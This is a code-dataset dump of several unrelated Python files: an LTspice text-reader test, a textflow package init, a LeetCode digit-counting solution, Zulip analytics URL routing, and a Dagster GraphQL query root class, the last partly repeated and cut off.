1c4a6920c0679fbb93d994ae2d9852889fe7d1aa | 2,118 | py | Python | tests/test_read_ltxt.py | l-johnston/toolbag | 1bd6ca61bfaf5856e5de320926d5593291e39e9c | ["MIT"] | null | null | null | tests/test_read_ltxt.py | l-johnston/toolbag | 1bd6ca61bfaf5856e5de320926d5593291e39e9c | ["MIT"] | null | null | null | tests/test_read_ltxt.py | l-johnston/toolbag | 1bd6ca61bfaf5856e5de320926d5593291e39e9c | ["MIT"] | null | null | null |
"""Test read_ltxt"""
from tempfile import TemporaryFile
from unyt import unyt_array
from unyt.testing import allclose_units
from toolbag import read_ltxt
# pylint: disable=missing-function-docstring
# pylint: disable=invalid-name
def test_time():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write("time\tV(out)\n0.0e+0\t1.0e+0\n1.0e+0\t2.0e+0")
file.seek(0)
data = read_ltxt(file)
assert data.header == "time\tV(out)"
assert data.legends == ["time", "V(out)"]
expected = unyt_array([0.0, 1.0], "s")
assert allclose_units(data.time, expected)
assert allclose_units(data["time"], expected)
assert allclose_units(data[0], expected)
expected = unyt_array([1.0, 2.0], "V")
assert allclose_units(data.V_out, expected)
assert allclose_units(data["V(out)"], expected)
assert allclose_units(data[1], expected)
def test_frequency_dBdeg():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write(
"""Freq.\tV(out)
0.0e+0\t(0.0e+0dB,0.0e+0°)
1.0e+0\t(-3.0e+0dB,-9.0e+1°)"""
)
file.seek(0)
data = read_ltxt(file)
assert data.header == "frequency\tV(out)"
expected = unyt_array([0.0, 1.0], "Hz")
assert allclose_units(data.frequency, expected)
expected = unyt_array([0.0, -3.0], "dB")
assert allclose_units(data.V_out[0], expected)
expected = unyt_array([0.0, -90.0], "degree")
assert allclose_units(data.V_out[1], expected)
def test_frequency_reim():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write(
"""Freq.\tV(out)
0.0e+0\t0.0e+0,0.0e+0
1.0e+0\t2.0e+0,3.0e+0"""
)
file.seek(0)
data = read_ltxt(file)
assert data.header == "frequency\tV(out)"
expected = unyt_array([0.0, 1.0], "Hz")
assert allclose_units(data.frequency, expected)
expected = unyt_array([0.0, 2.0], "V")
assert allclose_units(data.V_out[0], expected)
expected = unyt_array([0.0, 3.0], "V")
assert allclose_units(data.V_out[1], expected)
| 34.721311 | 66 | 0.626062 | true | true |
1c4a6a7fe13f1d334ea7b780e192d677da6eed5f | 570 | py | Python | textflow/model/__init__.py | ysenarath/textflow | ebb86cbedaf6ba7ed62a9f811a7d7d1818d938ac | ["MIT"] | 4 | 2020-12-10T19:38:15.000Z | 2021-08-02T02:00:46.000Z | textflow/model/__init__.py | ysenarath/textflow | ebb86cbedaf6ba7ed62a9f811a7d7d1818d938ac | ["MIT"] | 2 | 2021-01-08T18:35:04.000Z | 2021-02-07T04:25:56.000Z | textflow/model/__init__.py | ysenarath/textflow | ebb86cbedaf6ba7ed62a9f811a7d7d1818d938ac | ["MIT"] | 1 | 2021-04-04T19:21:40.000Z | 2021-04-04T19:21:40.000Z |
""" Model """
from textflow.model.annotation import AnnotationSet, Annotation, AnnotationSpan
from textflow.model.dataset import Dataset, datasets
from textflow.model.document import Document
from textflow.model.label import Label
from textflow.model.estimator import estimators
from textflow.model.project import Project
from textflow.model.user import Assignment, User
__all__ = [
'Annotation',
'AnnotationSet',
'AnnotationSpan',
'Document',
'Project',
'Label',
'Assignment',
'User',
'Dataset',
'datasets',
'estimators',
]
| 24.782609 | 79 | 0.72807 | true | true |
1c4a6aa6a00384fc6746c01b52b7972d18f38e00 | 679 | py | Python | src/leetcode/Coding_Interviews/number_of_1.py | highing666/leaving | c121ee2f61e45472bb71e2770d0697e902279a64 | ["MIT"] | null | null | null | src/leetcode/Coding_Interviews/number_of_1.py | highing666/leaving | c121ee2f61e45472bb71e2770d0697e902279a64 | ["MIT"] | null | null | null | src/leetcode/Coding_Interviews/number_of_1.py | highing666/leaving | c121ee2f61e45472bb71e2770d0697e902279a64 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
class Solution:
def countDigitOne(self, n: int) -> int:
        digit, result = 1, 0
        # Split n around the current digit position so that
        # n == high * 10 * digit + cur * digit + low.
        high, cur, low = n // 10, n % 10, 0
        while high != 0 or cur != 0:
            if cur == 0:
                # Current digit is 0: '1' occupies this position high * digit times.
                result += high * digit
            elif cur == 1:
                # Current digit is 1: high * digit full rounds plus the
                # partial round 0..low.
                result += high * digit + low + 1
            else:
                # Current digit is 2-9: (high + 1) * digit occurrences.
                result += (high + 1) * digit
            # Move the window one decimal place to the left.
            low += cur * digit
            cur = high % 10
            high //= 10
            digit *= 10
        return result
if __name__ == "__main__":
solution = Solution()
test_num = 12344
print(solution.countDigitOne(test_num))
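# Worked example for n = 12344, summing the contribution of each digit position
# (ones through ten-thousands): 1235 + 1240 + 1300 + 2000 + 2345 = 8120,
# so the script above prints 8120.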
| 23.413793 | 48 | 0.427099 | true | true |
1c4a6b229d3ab0ade8a6a29420ac282ec48469e8 | 2,616 | py | Python | analytics/urls.py | fearless0307/zulip | 378d14af7ea73a9a83c7245706cd918bec5a37bf | ["Apache-2.0"] | 2 | 2019-04-24T15:22:52.000Z | 2020-01-18T11:01:31.000Z | analytics/urls.py | fearless0307/zulip | 378d14af7ea73a9a83c7245706cd918bec5a37bf | ["Apache-2.0"] | 10 | 2019-02-26T11:10:42.000Z | 2019-02-26T14:30:24.000Z | analytics/urls.py | fearless0307/zulip | 378d14af7ea73a9a83c7245706cd918bec5a37bf | ["Apache-2.0"] | 1 | 2020-01-07T15:49:54.000Z | 2020-01-07T15:49:54.000Z |
from django.conf.urls import include, url
import analytics.views
from zerver.lib.rest import rest_dispatch
i18n_urlpatterns = [
# Server admin (user_profile.is_staff) visible stats pages
url(r'^activity$', analytics.views.get_activity,
name='analytics.views.get_activity'),
url(r'^realm_activity/(?P<realm_str>[\S]+)/$', analytics.views.get_realm_activity,
name='analytics.views.get_realm_activity'),
url(r'^user_activity/(?P<email>[\S]+)/$', analytics.views.get_user_activity,
name='analytics.views.get_user_activity'),
url(r'^stats/realm/(?P<realm_str>[\S]+)/$', analytics.views.stats_for_realm,
name='analytics.views.stats_for_realm'),
url(r'^stats/installation$', analytics.views.stats_for_installation,
name='analytics.views.stats_for_installation'),
url(r'^stats/remote/(?P<remote_server_id>[\S]+)/installation$',
analytics.views.stats_for_remote_installation,
name='analytics.views.stats_for_remote_installation'),
url(r'^stats/remote/(?P<remote_server_id>[\S]+)/realm/(?P<remote_realm_id>[\S]+)/$',
analytics.views.stats_for_remote_realm,
name='analytics.views.stats_for_remote_realm'),
# User-visible stats page
url(r'^stats$', analytics.views.stats,
name='analytics.views.stats'),
]
# These endpoints are a part of the API (V1), which uses:
# * REST verbs
# * Basic auth (username:password is email:apiKey)
# * Takes and returns json-formatted data
#
# See rest_dispatch in zerver.lib.rest for an explanation of auth methods used
#
# All of these paths are accessed by either a /json or /api prefix
v1_api_and_json_patterns = [
# get data for the graphs at /stats
url(r'^analytics/chart_data$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data'}),
url(r'^analytics/chart_data/realm/(?P<realm_str>[\S]+)$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_realm'}),
url(r'^analytics/chart_data/installation$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_installation'}),
url(r'^analytics/chart_data/remote/(?P<remote_server_id>[\S]+)/installation$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_remote_installation'}),
url(r'^analytics/chart_data/remote/(?P<remote_server_id>[\S]+)/realm/(?P<remote_realm_id>[\S]+)$',
rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_remote_realm'}),
]
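# Example request shape (host, email, and API key are placeholders; as noted
# above, authentication is HTTP basic with email:apiKey):
#
#   curl -u iago@example.com:API_KEY \
#        https://zulip.example.com/api/v1/analytics/chart_data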
i18n_urlpatterns += [
url(r'^api/v1/', include(v1_api_and_json_patterns)),
url(r'^json/', include(v1_api_and_json_patterns)),
]
urlpatterns = i18n_urlpatterns
| 43.6 | 102 | 0.706804 | true | true |
1c4a6b3c9898b1cd500e1c9204c8490401f0ca8f | 18,701 | py | Python | python_modules/dagster-graphql/dagster_graphql/schema/roots/query.py | ibelikov/dagster | 6781eaadd33ecfb0b48d7c2c7d8e193efbda4209 | ["Apache-2.0"] | null | null | null | python_modules/dagster-graphql/dagster_graphql/schema/roots/query.py | ibelikov/dagster | 6781eaadd33ecfb0b48d7c2c7d8e193efbda4209 | ["Apache-2.0"] | null | null | null | python_modules/dagster-graphql/dagster_graphql/schema/roots/query.py | ibelikov/dagster | 6781eaadd33ecfb0b48d7c2c7d8e193efbda4209 | ["Apache-2.0"] | 1 | 2021-11-25T11:06:39.000Z | 2021-11-25T11:06:39.000Z |
import graphene
from dagster import check
from dagster.core.definitions.events import AssetKey
from dagster.core.execution.backfill import BulkActionStatus
from dagster.core.host_representation import (
InstigationSelector,
RepositorySelector,
ScheduleSelector,
SensorSelector,
)
from dagster.core.scheduler.instigation import InstigatorType
from ...implementation.external import fetch_repositories, fetch_repository, fetch_workspace
from ...implementation.fetch_assets import get_asset, get_asset_node, get_asset_nodes, get_assets
from ...implementation.fetch_backfills import get_backfill, get_backfills
from ...implementation.fetch_jobs import get_job_state_or_error, get_unloadable_job_states_or_error
from ...implementation.fetch_partition_sets import get_partition_set, get_partition_sets_or_error
from ...implementation.fetch_pipelines import (
get_pipeline_or_error,
get_pipeline_snapshot_or_error_from_pipeline_selector,
get_pipeline_snapshot_or_error_from_snapshot_id,
)
from ...implementation.fetch_runs import (
get_execution_plan,
get_run_by_id,
get_run_group,
get_run_groups,
get_run_tags,
validate_pipeline_config,
)
from ...implementation.fetch_schedules import (
get_schedule_or_error,
get_scheduler_or_error,
get_schedules_or_error,
)
from ...implementation.fetch_sensors import get_sensor_or_error, get_sensors_or_error
from ...implementation.fetch_solids import get_graph_or_error
from ...implementation.loader import BatchMaterializationLoader
from ...implementation.run_config_schema import resolve_run_config_schema_or_error
from ...implementation.utils import graph_selector_from_graphql, pipeline_selector_from_graphql
from ..asset_graph import GrapheneAssetNode, GrapheneAssetNodeOrError
from ..backfill import (
GrapheneBulkActionStatus,
GraphenePartitionBackfillOrError,
GraphenePartitionBackfillsOrError,
)
from ..external import (
GrapheneRepositoriesOrError,
GrapheneRepositoryOrError,
GrapheneWorkspaceOrError,
)
from ..inputs import (
GrapheneAssetKeyInput,
GrapheneGraphSelector,
GrapheneInstigationSelector,
GraphenePipelineSelector,
GrapheneRepositorySelector,
GrapheneRunsFilter,
GrapheneScheduleSelector,
GrapheneSensorSelector,
)
from ..instance import GrapheneInstance
from ..instigation import (
GrapheneInstigationStateOrError,
GrapheneInstigationStatesOrError,
GrapheneInstigationType,
)
from ..partition_sets import GraphenePartitionSetOrError, GraphenePartitionSetsOrError
from ..permissions import GraphenePermission
from ..pipelines.config_result import GraphenePipelineConfigValidationResult
from ..pipelines.pipeline import GrapheneRunOrError
from ..pipelines.snapshot import GraphenePipelineSnapshotOrError
from ..run_config import GrapheneRunConfigSchemaOrError
from ..runs import (
GrapheneRunConfigData,
GrapheneRunGroupOrError,
GrapheneRunGroupsOrError,
GrapheneRuns,
GrapheneRunsOrError,
parse_run_config_input,
)
from ..schedules import GrapheneScheduleOrError, GrapheneSchedulerOrError, GrapheneSchedulesOrError
from ..sensors import GrapheneSensorOrError, GrapheneSensorsOrError
from ..tags import GraphenePipelineTagAndValues
from ..util import non_null_list
from .assets import GrapheneAssetOrError, GrapheneAssetsOrError
from .execution_plan import GrapheneExecutionPlanOrError
from .pipeline import GrapheneGraphOrError, GraphenePipelineOrError
class GrapheneDagitQuery(graphene.ObjectType):
class Meta:
name = "DagitQuery"
version = graphene.NonNull(graphene.String)
repositoriesOrError = graphene.NonNull(GrapheneRepositoriesOrError)
repositoryOrError = graphene.Field(
graphene.NonNull(GrapheneRepositoryOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
workspaceOrError = graphene.NonNull(GrapheneWorkspaceOrError)
pipelineOrError = graphene.Field(
graphene.NonNull(GraphenePipelineOrError), params=graphene.NonNull(GraphenePipelineSelector)
)
pipelineSnapshotOrError = graphene.Field(
graphene.NonNull(GraphenePipelineSnapshotOrError),
snapshotId=graphene.String(),
activePipelineSelector=graphene.Argument(GraphenePipelineSelector),
)
graphOrError = graphene.Field(
graphene.NonNull(GrapheneGraphOrError),
selector=graphene.Argument(GrapheneGraphSelector),
)
scheduler = graphene.Field(graphene.NonNull(GrapheneSchedulerOrError))
scheduleOrError = graphene.Field(
graphene.NonNull(GrapheneScheduleOrError),
schedule_selector=graphene.NonNull(GrapheneScheduleSelector),
)
schedulesOrError = graphene.Field(
graphene.NonNull(GrapheneSchedulesOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
sensorOrError = graphene.Field(
graphene.NonNull(GrapheneSensorOrError),
sensorSelector=graphene.NonNull(GrapheneSensorSelector),
)
sensorsOrError = graphene.Field(
graphene.NonNull(GrapheneSensorsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
instigationStateOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStateOrError),
instigationSelector=graphene.NonNull(GrapheneInstigationSelector),
)
unloadableInstigationStatesOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStatesOrError),
instigationType=graphene.Argument(GrapheneInstigationType),
)
partitionSetsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
pipelineName=graphene.NonNull(graphene.String),
)
partitionSetOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
partitionSetName=graphene.String(),
)
pipelineRunsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
pipelineRunOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
runsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
runOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
pipelineRunTags = non_null_list(GraphenePipelineTagAndValues)
runGroupOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupOrError), runId=graphene.NonNull(graphene.ID)
)
runGroupsOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
isPipelineConfigValid = graphene.Field(
graphene.NonNull(GraphenePipelineConfigValidationResult),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
executionPlanOrError = graphene.Field(
graphene.NonNull(GrapheneExecutionPlanOrError),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
runConfigSchemaOrError = graphene.Field(
graphene.NonNull(GrapheneRunConfigSchemaOrError),
args={
"selector": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"mode": graphene.Argument(graphene.String),
},
description="""Fetch an environment schema given an execution selection and a mode.
        See the description on RunConfigSchema for more information.""",
)
instance = graphene.NonNull(GrapheneInstance)
assetsOrError = graphene.Field(
graphene.NonNull(GrapheneAssetsOrError),
prefix=graphene.List(graphene.NonNull(graphene.String)),
cursor=graphene.String(),
limit=graphene.Int(),
)
assetOrError = graphene.Field(
graphene.NonNull(GrapheneAssetOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
assetNodes = graphene.Field(
non_null_list(GrapheneAssetNode),
pipeline=graphene.Argument(GraphenePipelineSelector),
assetKeys=graphene.Argument(graphene.List(graphene.NonNull(GrapheneAssetKeyInput))),
loadMaterializations=graphene.Boolean(default_value=False),
)
assetNodeOrError = graphene.Field(
graphene.NonNull(GrapheneAssetNodeOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
partitionBackfillOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillOrError),
backfillId=graphene.Argument(graphene.NonNull(graphene.String)),
)
partitionBackfillsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillsOrError),
status=graphene.Argument(GrapheneBulkActionStatus),
cursor=graphene.String(),
limit=graphene.Int(),
)
permissions = graphene.Field(non_null_list(GraphenePermission))
def resolve_repositoriesOrError(self, graphene_info):
return fetch_repositories(graphene_info)
def resolve_repositoryOrError(self, graphene_info, **kwargs):
return fetch_repository(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_workspaceOrError(self, graphene_info):
return fetch_workspace(graphene_info.context)
def resolve_pipelineSnapshotOrError(self, graphene_info, **kwargs):
snapshot_id_arg = kwargs.get("snapshotId")
pipeline_selector_arg = kwargs.get("activePipelineSelector")
check.invariant(
not (snapshot_id_arg and pipeline_selector_arg),
"Must only pass one of snapshotId or activePipelineSelector",
)
check.invariant(
snapshot_id_arg or pipeline_selector_arg,
"Must set one of snapshotId or activePipelineSelector",
)
if pipeline_selector_arg:
pipeline_selector = pipeline_selector_from_graphql(kwargs["activePipelineSelector"])
return get_pipeline_snapshot_or_error_from_pipeline_selector(
graphene_info, pipeline_selector
)
else:
return get_pipeline_snapshot_or_error_from_snapshot_id(graphene_info, snapshot_id_arg)
def resolve_graphOrError(self, graphene_info, **kwargs):
graph_selector = graph_selector_from_graphql(kwargs["selector"])
return get_graph_or_error(graphene_info, graph_selector)
def resolve_version(self, graphene_info):
return graphene_info.context.version
def resolve_scheduler(self, graphene_info):
return get_scheduler_or_error(graphene_info)
def resolve_scheduleOrError(self, graphene_info, schedule_selector):
return get_schedule_or_error(
graphene_info, ScheduleSelector.from_graphql_input(schedule_selector)
)
def resolve_schedulesOrError(self, graphene_info, **kwargs):
return get_schedules_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_sensorOrError(self, graphene_info, sensorSelector):
return get_sensor_or_error(graphene_info, SensorSelector.from_graphql_input(sensorSelector))
def resolve_sensorsOrError(self, graphene_info, **kwargs):
return get_sensors_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_instigationStateOrError(self, graphene_info, instigationSelector):
return get_job_state_or_error(
graphene_info, InstigationSelector.from_graphql_input(instigationSelector)
)
def resolve_unloadableInstigationStatesOrError(self, graphene_info, **kwargs):
job_type = (
InstigatorType(kwargs["instigationType"]) if "instigationType" in kwargs else None
)
return get_unloadable_job_states_or_error(graphene_info, job_type)
def resolve_pipelineOrError(self, graphene_info, **kwargs):
return get_pipeline_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["params"]),
)
def resolve_pipelineRunsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_pipelineRunOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
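    # runsOrError / runOrError below mirror pipelineRunsOrError / pipelineRunOrError
    # above; the resolver bodies are identical.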
def resolve_runsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_runOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runGroupsOrError(self, graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRunGroupsOrError(
results=get_run_groups(
graphene_info, filters, kwargs.get("cursor"), kwargs.get("limit")
)
)
def resolve_partitionSetsOrError(self, graphene_info, **kwargs):
return get_partition_sets_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("pipelineName"),
)
def resolve_partitionSetOrError(self, graphene_info, **kwargs):
return get_partition_set(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("partitionSetName"),
)
def resolve_pipelineRunTags(self, graphene_info):
return get_run_tags(graphene_info)
def resolve_runGroupOrError(self, graphene_info, runId):
return get_run_group(graphene_info, runId)
def resolve_isPipelineConfigValid(self, graphene_info, pipeline, **kwargs):
return validate_pipeline_config(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_executionPlanOrError(self, graphene_info, pipeline, **kwargs):
return get_execution_plan(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_runConfigSchemaOrError(self, graphene_info, **kwargs):
return resolve_run_config_schema_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["selector"]),
kwargs.get("mode"),
)
def resolve_instance(self, graphene_info):
return GrapheneInstance(graphene_info.context.instance)
def resolve_assetNodes(self, graphene_info, **kwargs):
asset_keys = set(
AssetKey.from_graphql_input(asset_key) for asset_key in kwargs.get("assetKeys", [])
)
if "pipeline" in kwargs:
pipeline_name = kwargs.get("pipeline").get("pipelineName")
repo_sel = RepositorySelector.from_graphql_input(kwargs.get("pipeline"))
repo_loc = graphene_info.context.get_repository_location(repo_sel.location_name)
repo = repo_loc.get_repository(repo_sel.repository_name)
external_asset_nodes = repo.get_external_asset_nodes(pipeline_name)
results = (
[GrapheneAssetNode(repo, asset_node) for asset_node in external_asset_nodes]
if external_asset_nodes
else []
)
else:
results = get_asset_nodes(graphene_info)
# Filter down to requested asset keys
results = [node for node in results if not asset_keys or node.assetKey in asset_keys]
if not results:
return []
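        # Share one batched materialization lookup across all matched asset nodes
        # rather than issuing a separate storage query per node.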
materialization_loader = BatchMaterializationLoader(
instance=graphene_info.context.instance, asset_keys=[node.assetKey for node in results]
)
return [
GrapheneAssetNode(
node.get_external_repository(),
node.get_external_asset_node(),
materialization_loader=materialization_loader,
)
for node in results
]
def resolve_assetNodeOrError(self, graphene_info, **kwargs):
return get_asset_node(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_assetsOrError(self, graphene_info, **kwargs):
return get_assets(
graphene_info,
prefix=kwargs.get("prefix"),
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_assetOrError(self, graphene_info, **kwargs):
return get_asset(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_partitionBackfillOrError(self, graphene_info, backfillId):
return get_backfill(graphene_info, backfillId)
def resolve_partitionBackfillsOrError(self, graphene_info, **kwargs):
status = kwargs.get("status")
return get_backfills(
graphene_info,
status=BulkActionStatus.from_graphql_input(status) if status else None,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_permissions(self, graphene_info):
permissions = graphene_info.context.permissions
return [GraphenePermission(permission, value) for permission, value in permissions.items()]
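# Illustrative query against this root type (field shapes are assumptions
# inferred from the resolvers above):
#   { version permissions { permission value } }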
| 38.087576 | 100 | 0.71825 | import graphene
from dagster import check
from dagster.core.definitions.events import AssetKey
from dagster.core.execution.backfill import BulkActionStatus
from dagster.core.host_representation import (
InstigationSelector,
RepositorySelector,
ScheduleSelector,
SensorSelector,
)
from dagster.core.scheduler.instigation import InstigatorType
from ...implementation.external import fetch_repositories, fetch_repository, fetch_workspace
from ...implementation.fetch_assets import get_asset, get_asset_node, get_asset_nodes, get_assets
from ...implementation.fetch_backfills import get_backfill, get_backfills
from ...implementation.fetch_jobs import get_job_state_or_error, get_unloadable_job_states_or_error
from ...implementation.fetch_partition_sets import get_partition_set, get_partition_sets_or_error
from ...implementation.fetch_pipelines import (
get_pipeline_or_error,
get_pipeline_snapshot_or_error_from_pipeline_selector,
get_pipeline_snapshot_or_error_from_snapshot_id,
)
from ...implementation.fetch_runs import (
get_execution_plan,
get_run_by_id,
get_run_group,
get_run_groups,
get_run_tags,
validate_pipeline_config,
)
from ...implementation.fetch_schedules import (
get_schedule_or_error,
get_scheduler_or_error,
get_schedules_or_error,
)
from ...implementation.fetch_sensors import get_sensor_or_error, get_sensors_or_error
from ...implementation.fetch_solids import get_graph_or_error
from ...implementation.loader import BatchMaterializationLoader
from ...implementation.run_config_schema import resolve_run_config_schema_or_error
from ...implementation.utils import graph_selector_from_graphql, pipeline_selector_from_graphql
from ..asset_graph import GrapheneAssetNode, GrapheneAssetNodeOrError
from ..backfill import (
GrapheneBulkActionStatus,
GraphenePartitionBackfillOrError,
GraphenePartitionBackfillsOrError,
)
from ..external import (
GrapheneRepositoriesOrError,
GrapheneRepositoryOrError,
GrapheneWorkspaceOrError,
)
from ..inputs import (
GrapheneAssetKeyInput,
GrapheneGraphSelector,
GrapheneInstigationSelector,
GraphenePipelineSelector,
GrapheneRepositorySelector,
GrapheneRunsFilter,
GrapheneScheduleSelector,
GrapheneSensorSelector,
)
from ..instance import GrapheneInstance
from ..instigation import (
GrapheneInstigationStateOrError,
GrapheneInstigationStatesOrError,
GrapheneInstigationType,
)
from ..partition_sets import GraphenePartitionSetOrError, GraphenePartitionSetsOrError
from ..permissions import GraphenePermission
from ..pipelines.config_result import GraphenePipelineConfigValidationResult
from ..pipelines.pipeline import GrapheneRunOrError
from ..pipelines.snapshot import GraphenePipelineSnapshotOrError
from ..run_config import GrapheneRunConfigSchemaOrError
from ..runs import (
GrapheneRunConfigData,
GrapheneRunGroupOrError,
GrapheneRunGroupsOrError,
GrapheneRuns,
GrapheneRunsOrError,
parse_run_config_input,
)
from ..schedules import GrapheneScheduleOrError, GrapheneSchedulerOrError, GrapheneSchedulesOrError
from ..sensors import GrapheneSensorOrError, GrapheneSensorsOrError
from ..tags import GraphenePipelineTagAndValues
from ..util import non_null_list
from .assets import GrapheneAssetOrError, GrapheneAssetsOrError
from .execution_plan import GrapheneExecutionPlanOrError
from .pipeline import GrapheneGraphOrError, GraphenePipelineOrError
class GrapheneDagitQuery(graphene.ObjectType):
class Meta:
name = "DagitQuery"
version = graphene.NonNull(graphene.String)
repositoriesOrError = graphene.NonNull(GrapheneRepositoriesOrError)
repositoryOrError = graphene.Field(
graphene.NonNull(GrapheneRepositoryOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
workspaceOrError = graphene.NonNull(GrapheneWorkspaceOrError)
pipelineOrError = graphene.Field(
graphene.NonNull(GraphenePipelineOrError), params=graphene.NonNull(GraphenePipelineSelector)
)
pipelineSnapshotOrError = graphene.Field(
graphene.NonNull(GraphenePipelineSnapshotOrError),
snapshotId=graphene.String(),
activePipelineSelector=graphene.Argument(GraphenePipelineSelector),
)
graphOrError = graphene.Field(
graphene.NonNull(GrapheneGraphOrError),
selector=graphene.Argument(GrapheneGraphSelector),
)
scheduler = graphene.Field(graphene.NonNull(GrapheneSchedulerOrError))
scheduleOrError = graphene.Field(
graphene.NonNull(GrapheneScheduleOrError),
schedule_selector=graphene.NonNull(GrapheneScheduleSelector),
)
schedulesOrError = graphene.Field(
graphene.NonNull(GrapheneSchedulesOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
sensorOrError = graphene.Field(
graphene.NonNull(GrapheneSensorOrError),
sensorSelector=graphene.NonNull(GrapheneSensorSelector),
)
sensorsOrError = graphene.Field(
graphene.NonNull(GrapheneSensorsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
instigationStateOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStateOrError),
instigationSelector=graphene.NonNull(GrapheneInstigationSelector),
)
unloadableInstigationStatesOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStatesOrError),
instigationType=graphene.Argument(GrapheneInstigationType),
)
partitionSetsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
pipelineName=graphene.NonNull(graphene.String),
)
partitionSetOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
partitionSetName=graphene.String(),
)
pipelineRunsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
pipelineRunOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
runsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
runOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
pipelineRunTags = non_null_list(GraphenePipelineTagAndValues)
runGroupOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupOrError), runId=graphene.NonNull(graphene.ID)
)
runGroupsOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
isPipelineConfigValid = graphene.Field(
graphene.NonNull(GraphenePipelineConfigValidationResult),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
